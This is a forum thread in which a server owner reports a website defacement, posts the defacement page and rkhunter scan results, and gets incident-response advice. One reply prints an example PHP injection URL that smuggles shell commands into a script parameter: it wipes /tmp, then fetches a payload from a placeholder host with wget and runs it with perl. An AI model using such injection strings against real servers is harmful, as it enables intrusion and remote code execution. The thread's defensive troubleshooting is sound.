Results 1 to 17 of 17
  1. #1
    Join Date
    Jun 2004
    Posts
    308

    server hacked ... advise needed

    my server hosting company sent me email telling me my website may have been defaced. and i should investigate my server for possible compromise as soon as possible. The defaced website is:

    www.AAAAAAAA.com/scgi-bin

    i fount afile named indrx.php and the content of it is:
    Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
    "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    <head>
    <title>Hacked By CyBeRLORD</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9">
    <style type="text/css">
    <!--
    body,td,th {
            color: #FFFFFF;
    }
    body {
            background-color: #000000;
    }
    .style1 {font-size: 36px}
    a:link {
            color: #FFFFFF;
    }
    a:visited {
            color: #000000;
    }
    -->
    </style></head>
    
    <body>
    <table width="984" border="0">
      <tr>
        <td height="98">&nbsp;</td>
        <td align="center"><img src="http://lejyoner21.sitemynet.com/11.jpg" width="323" height="349"> </td>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td height="114">&nbsp;</td>
        <td align="center"><span class="style1">Hacked By CyBeRLORD Owns Your System </span></td>
    <td align="center"><span class="style1">cyberlord@hiperturk.com </span></td>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td height="216">&nbsp;</td>
        <td align="center"><span class="style1"><a href="http://biyo.5gigs.com">www.cyber-soldiers.org and www.biyo.tk</a></span></td>
        <td>&nbsp;</td>
      </tr>
    </table>
    </body>
    </html>
    that folder was created on 28/10/2005 . i deleted that folder and run rkhunter and the results was :

    Code:
    Checking binaries
    * Selftests
         Strings (command)                                        [ OK ]
    
    
    * System tools
      Performing 'known good' check...
       /bin/cat                                                   [ OK ]
       /bin/chmod                                                 [ OK ]
       /bin/chown                                                 [ OK ]
       /bin/dmesg                                                 [ BAD ]
       /bin/egrep                                                 [ OK ]
       /bin/env                                                   [ OK ]
       /bin/fgrep                                                 [ OK ]
       /bin/grep                                                  [ OK ]
       /bin/kill                                                  [ BAD ]
       /bin/login                                                 [ BAD ]
       /bin/ls                                                    [ OK ]
       /bin/mount                                                 [ BAD ]
       /bin/netstat                                               [ OK ]
       /bin/ps                                                    [ OK ]
       /bin/su                                                    [ OK ]
       /sbin/chkconfig                                            [ OK ]
       /sbin/depmod                                               [ OK ]
       /sbin/ifconfig                                             [ OK ]
       /sbin/init                                                 [ OK ]
       /sbin/insmod                                               [ OK ]
       /sbin/modinfo                                              [ OK ]
       /sbin/runlevel                                             [ OK ]
       /sbin/sysctl                                               [ OK ]
       /sbin/syslogd                                              [ OK ]
       /usr/bin/file                                              [ OK ]
       /usr/bin/find                                              [ OK ]
       /usr/bin/groups                                            [ OK ]
       /usr/bin/kill                                              [ OK ]
       /usr/bin/killall                                           [ OK ]
       /usr/bin/lsattr                                            [ OK ]
       /usr/bin/pstree                                            [ OK ]
       /usr/bin/sha1sum                                           [ OK ]
       /usr/bin/stat                                              [ OK ]
       /usr/bin/users                                             [ OK ]
       /usr/bin/w                                                 [ OK ]
       /usr/bin/watch                                             [ OK ]
       /usr/bin/who                                               [ OK ]
       /usr/bin/whoami                                            [ OK ]
    --------------------------------------------------------------------------------
    Rootkit Hunter found some bad or unknown hashes. This can be happen due replaced
    binaries or updated packages (which give other hashes). Be sure your hashes are
    fully updated (rkhunter --update). If you're in doubt about these hashes, contact
    the author (fill in the contact form).
    
    
    Check rootkits
    * Default files and directories
       Rootkit '55808 Trojan - Variant A'...                      [ OK ]
       ADM Worm...                                                [ OK ]
       Rootkit 'AjaKit'...                                        [ OK ]
       Rootkit 'aPa Kit'...                                       [ OK ]
       Rootkit 'Apache Worm'...                                   [ OK ]
       Rootkit 'Ambient (ark) Rootkit'...                         [ OK ]
       Rootkit 'Balaur Rootkit'...                                [ OK ]
       Rootkit 'BeastKit'...                                      [ OK ]
       Rootkit 'beX2'...                                          [ OK ]
       Rootkit 'BOBKit'...                                        [ OK ]
       Rootkit 'CiNIK Worm (Slapper.B variant)'...                [ OK ]
       Rootkit 'Danny-Boy's Abuse Kit'...                         [ OK ]
       Rootkit 'Devil RootKit'...                                 [ OK ]
       Rootkit 'Dica'...                                          [ OK ]
       Rootkit 'Dreams Rootkit'...                                [ OK ]
       Rootkit 'Duarawkz'...                                      [ OK ]
       Rootkit 'Flea Linux Rootkit'...                            [ OK ]
       Rootkit 'FreeBSD Rootkit'...                               [ OK ]
       Rootkit '****`it Rootkit'...                               [ OK ]
       Rootkit 'GasKit'...                                        [ OK ]
       Rootkit 'Heroin LKM'...                                    [ OK ]
       Rootkit 'HjC Kit'...                                       [ OK ]
       Rootkit 'ignoKit'...                                       [ OK ]
       Rootkit 'ImperalsS-FBRK'...                                [ OK ]
       Rootkit 'Irix Rootkit'...                                  [ OK ]
       Rootkit 'Kitko'...                                         [ OK ]
       Rootkit 'Knark'...                                         [ OK ]
       Rootkit 'Li0n Worm'...                                     [ OK ]
       Rootkit 'Lockit / LJK2'...                                 [ OK ]
       Rootkit 'MRK'...                                           [ OK ]
       Rootkit 'Ni0 Rootkit'...                                   [ OK ]
       Rootkit 'RootKit for SunOS / NSDAP'...                     [ OK ]
       Rootkit 'Optic Kit (Tux)'...                               [ OK ]
       Rootkit 'Oz Rootkit'...                                    [ OK ]
       Rootkit 'Portacelo'...                                     [ OK ]
       Rootkit 'R3dstorm Toolkit'...                              [ OK ]
       Rootkit 'RH-Sharpe's rootkit'...                           [ OK ]
       Rootkit 'RSHA's rootkit'...                                [ OK ]
       Sebek LKM                                                  [ OK ]
       Rootkit 'Scalper Worm'...                                  [ OK ]
       Rootkit 'Shutdown'...                                      [ OK ]
       Rootkit 'SHV4'...                                          [ OK ]
       Rootkit 'SHV5'...                                          [ OK ]
       Rootkit 'Sin Rootkit'...                                   [ OK ]
       Rootkit 'Slapper'...                                       [ OK ]
       Rootkit 'Sneakin Rootkit'...                               [ OK ]
       Rootkit 'Suckit Rootkit'...                                [ OK ]
       Rootkit 'SunOS Rootkit'...                                 [ OK ]
       Rootkit 'Superkit'...                                      [ OK ]
       Rootkit 'TBD (Telnet BackDoor)'...                         [ OK ]
       Rootkit 'TeLeKiT'...                                       [ OK ]
       Rootkit 'T0rn Rootkit'...                                  [ OK ]
       Rootkit 'Trojanit Kit'...                                  [ OK ]
       Rootkit 'Tuxtendo'...                                      [ OK ]
       Rootkit 'URK'...                                           [ OK ]
       Rootkit 'VcKit'...                                         [ OK ]
       Rootkit 'Volc Rootkit'...                                  [ OK ]
       Rootkit 'X-Org SunOS Rootkit'...                           [ OK ]
       Rootkit 'zaRwT.KiT Rootkit'...                             [ OK ]
    
    * Suspicious files and malware
       Scanning for known rootkit strings                         [ OK ]
       Scanning for known rootkit files                           [ OK ]
       Testing running processes...                               [ OK ]
       Miscellaneous Login backdoors                              [ OK ]
       Miscellaneous directories                                  [ OK ]
       Software related files                                     [ OK ]
       Sniffer logs                                               [ OK ]
    
    * Trojan specific characteristics
       shv4
         Checking /etc/rc.d/rc.sysinit
           Test 1                                                 [ Clean ]
           Test 2                                                 [ Clean ]
           Test 3                                                 [ Clean ]
         Checking /etc/inetd.conf                                 [ Clean ]
         Checking /etc/xinetd.conf                                [ Clean ]
    
    * Suspicious file properties
       chmod properties
         Checking /bin/ps                                         [ Clean ]
         Checking /bin/ls                                         [ Clean ]
         Checking /usr/bin/w                                      [ Clean ]
         Checking /usr/bin/who                                    [ Clean ]
         Checking /bin/netstat                                    [ Clean ]
         Checking /bin/login                                      [ Clean ]
       Script replacements
         Checking /bin/ps                                         [ Clean ]
         Checking /bin/ls                                         [ Clean ]
         Checking /usr/bin/w                                      [ Clean ]
         Checking /usr/bin/who                                    [ Clean ]
         Checking /bin/netstat                                    [ Clean ]
         Checking /bin/login                                      [ Clean ]
    
    * OS dependant tests
     Linux
         Checking loaded kernel modules...                        [ OK ]
         Checking files attributes                                [ OK ]
         Checking LKM module path                                 [ OK ]
    
    
    Networking
    * Check: frequently used backdoors
    warning, got bogus tcp line.
      Port 2001: Scalper Rootkit                                  [ OK ]
      Port 2006: CB Rootkit                                       [ OK ]
      Port 2128: MRK                                              [ OK ]
      Port 14856: Optic Kit (Tux)                                 [ OK ]
      Port 47107: T0rn Rootkit                                    [ OK ]
      Port 60922: zaRwT.KiT                                       [ OK ]
    
    * Interfaces
         Scanning for promiscuous interfaces                      [ OK ]
    
    System checks
    * Allround tests
       Checking hostname... Found. Hostname is host.indexsignal.com
       Checking for passwordless user accounts... OK
       Checking for differences in user accounts... OK. No changes.
       Checking for differences in user groups... OK. No changes.
       Checking boot.local/rc.local file...
         - /etc/rc.local                                          [ OK ]
         - /etc/rc.d/rc.local                                     [ OK ]
         - /usr/local/etc/rc.local                                [ Not found ]
         - /usr/local/etc/rc.d/rc.local                           [ Not found ]
         - /etc/conf.d/local.start                                [ Not found ]
         - /etc/init.d/boot.local                                 [ Not found ]
       Checking rc.d files...
         Processing........................................
                   ........................................
                   ........................................
                   .....................................
                   ........................................
                   ........................................
                   ........................................
                   ........................................
                   ........................................
                   ........................................
                   ..............
       Result rc.d files check                                    [ OK ]
       Checking history files
         Bourne Shell                                             [ OK ]
    
    * Filesystem checks
       Checking /dev for suspicious files...                      [ OK ]
       Scanning for hidden files...                      
    
    Application advisories
    * Application scan
       Checking Apache2 modules ...                               [ Not found ]
       Checking Apache configuration ...                          [ OK ]
    
    * Application version scan
       - Exim MTA 4.52                                            [ OK ]
       - GnuPG 1.2.1                                              [ Old or patched version ]
       - Apache [unknown]                                         [ OK ]
       - Bind DNS 9.2.4                                           [ OK ]
       - OpenSSL 0.9.7a                                           [ Old or patched version ]
       - PHP 4.3.11                                               [ OK ]
       - PHP 4.3.11                                               [ OK ]
       - Procmail MTA 3.22                                        [ OK ]
       - OpenSSH 3.6.1p2                                          [ Old or patched version ]
    
    
    
    Security advisories
    * Check: Groups and Accounts
       Searching for /etc/passwd...                               [ Found ]
       Checking users with UID '0' (root)...                      [ OK ]
    
    * Check: SSH
       Searching for sshd_config...
       Found /etc/ssh/sshd_config
       Checking for allowed root login... Watch out Root login possible. Possible risk!
        info:
        Hint: See logfile for more information about this issue
       Checking for allowed protocols...                          [ OK (Only SSH2 allowed) ]
    
    * Check: Events and Logging
       Search for syslog configuration...                         [ OK ]
       Checking for running syslog slave...                       [ OK ]
       Checking for logging to remote system...                   [ OK (no remote logging) ]
    
    ---------------------------- Scan results ----------------------------
    
    MD5
    MD5 compared: 115
    Incorrect MD5 checksums: 4
    
    File scan
    Scanned files: 342
    Possible infected files: 0
    
    Application scan
    Vulnerable applications: 3
    
    Scanning took 672 seconds

    i did all my best to secure my server following all advices mentioned in WebHostingTalk forum for the past 2 years and i was updating every thing in my box to secure it

    there only my personal website on this server so am the only user

    how did that hacker got into my server?

    the only thing i remeber that might cuz this is installing php mailing list 2 weeks ago

    and do i need to reformat my server? i hope not

  2. #2
    Join Date
    Mar 2002
    Location
    St. Louis, MO
    Posts
    1,379
    While it doesnt neccessary appear your system has been rooted, more then likely what was used was some form of php injection or some other exploit in a script like something like this as an example

    somescript.php?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://somesite.com/.it/in;perl%20in;

    Wouldnt hurt to perform other audits on your system anyway. Look thru your logs, once you figure out how it was done you can install or disable somethign to futher prevent it, like mod_security

  3. #3
    Join Date
    Jun 2004
    Posts
    308
    i did ( last | more ) to check if someone else was ssh my server but i found nothing...my IP adress was the only thing loging my server on october

  4. #4
    Join Date
    Jun 2004
    Posts
    308
    i sent my box hosting company email asking then if OS reload needed and the reply was :

    (( An OS reload is not necessary in this case, it would seem you have done enough to help secure the server. The php email list script was the most likely cause of this if you have not had problems recently ))

    i will take a look in that php email list script code and see if i find somthing in it

  5. #5
    Join Date
    Mar 2002
    Location
    St. Louis, MO
    Posts
    1,379
    Run this see if you get anything

    for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;

  6. #6
    Join Date
    Nov 2003
    Location
    Oklahoma
    Posts
    146
    Just wondering if you were running CPanel? Either way I would recommend you use cpanel script to secure your tmp folder or find the procedure to do this.
    Regards,
    Randy
    Okie Net Web Hosting

  7. #7
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    From what you posted your server does not look rooted. One very important thing to keep update is the kernel. If you keep your kernel updated you are going to have a lot less of a chance of getting rooted by these anoying php injection attacks.

    If possible limit your available php functions and it will help with these sorts of attacks.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  8. #8
    Join Date
    Jun 2004
    Posts
    308
    Quote Originally Posted by DigiCrime
    Run this see if you get anything

    for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;

    do u mean #grep [ filename ] for every file in /usr/local/apache/domlogs/ ?

    or grep "wget" $files; done;[ filename ]

    cuz am getting syntax errors

  9. #9
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    Quote Originally Posted by xmlxp
    do u mean #grep [ filename ] for every file in /usr/local/apache/domlogs/ ?

    or grep "wget" $files; done;[ filename ]

    cuz am getting syntax errors
    do:

    egrep wget /usr/local/apache/domlogs/*

    but keep in mind there are more ways then just wget to put a sript on your server
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  10. #10
    Join Date
    Jun 2004
    Posts
    308
    Quote Originally Posted by rhenderson
    Just wondering if you were running CPanel? Either way I would recommend you use cpanel script to secure your tmp folder or find the procedure to do this.
    i am using

    WHM 10.6.0 cPanel 10.8.0-S59
    RedHat Enterprise 3 i686 - WHM X v3.1.0

    and did all necessary security teak needs for Cpanel

  11. #11
    Join Date
    Jun 2004
    Posts
    308
    Quote Originally Posted by eth00
    From what you posted your server does not look rooted. One very important thing to keep update is the kernel. If you keep your kernel updated you going to have a lot less of a chance of getting rooted by these anoying php . injection attacksare

    If possible limit your available php functions and it will help with these sorts of attacks.
    i did update kernel to 2.4.21-37.EL on the second day of release

    php open_basedir Protection is enabled
    php safe mode on

    and did every thing in here
    http://www.hostinglife.com/security.php

    where i can read about these anoying php injection attacks ?

  12. #12
    Join Date
    Nov 2003
    Location
    Oklahoma
    Posts
    146
    Quote Originally Posted by xmlxp
    i am using

    WHM 10.6.0 cPanel 10.8.0-S59
    RedHat Enterprise 3 i686 - WHM X v3.1.0

    and did all necessary security teak needs for Cpanel
    I was talking about /scripts/securetmp from ssh. Without securing the /tmp and /var/tmp it leaves a hole for php scripts to get in and be executed causing a problem like you described.

    Good Luck
    Regards,
    Randy
    Okie Net Web Hosting

  13. #13
    Join Date
    Jun 2004
    Posts
    308
    Quote Originally Posted by eth00
    do:

    egrep wget /usr/local/apache/domlogs/*

    but keep in mind there are more ways then just wget to put a sript on your server
    the output was nothing


    root@host [~]# egrep wget /usr/local/apache/domlogs/*
    root@host [~]#

  14. #14
    Join Date
    Mar 2002
    Location
    St. Louis, MO
    Posts
    1,379
    Quote Originally Posted by xmlxp
    do u mean #grep [ filename ] for every file in /usr/local/apache/domlogs/ ?

    or grep "wget" $files; done;[ filename ]

    cuz am getting syntax errors
    Nope just as I have it copy paste

  15. #15
    Join Date
    Jun 2004
    Posts
    308
    Quote Originally Posted by DigiCrime
    Nope just as I have it copy paste
    root@host [/]# /usr/local/apache/domlogs/*; do grep "wget" $files; done;
    -bash: syntax error near unexpected token `do'

  16. #16
    Join Date
    Mar 2002
    Location
    St. Louis, MO
    Posts
    1,379
    Code:
    for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
    That exact line for files in is part of the command, doesnt mean youll turn up anything but wouldnt hurt to check

  17. #17
    Join Date
    Jun 2004
    Posts
    308
    Quote Originally Posted by DigiCrime
    Code:
    for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
    That exact line for files in is part of the command, doesnt mean youll turn up anything but wouldnt hurt to check
    the output was nothing

    Code:
    root@host [~]#for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
    root@host [~]#
    Last edited by XMLxp; 10-31-2005 at 07:12 PM.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •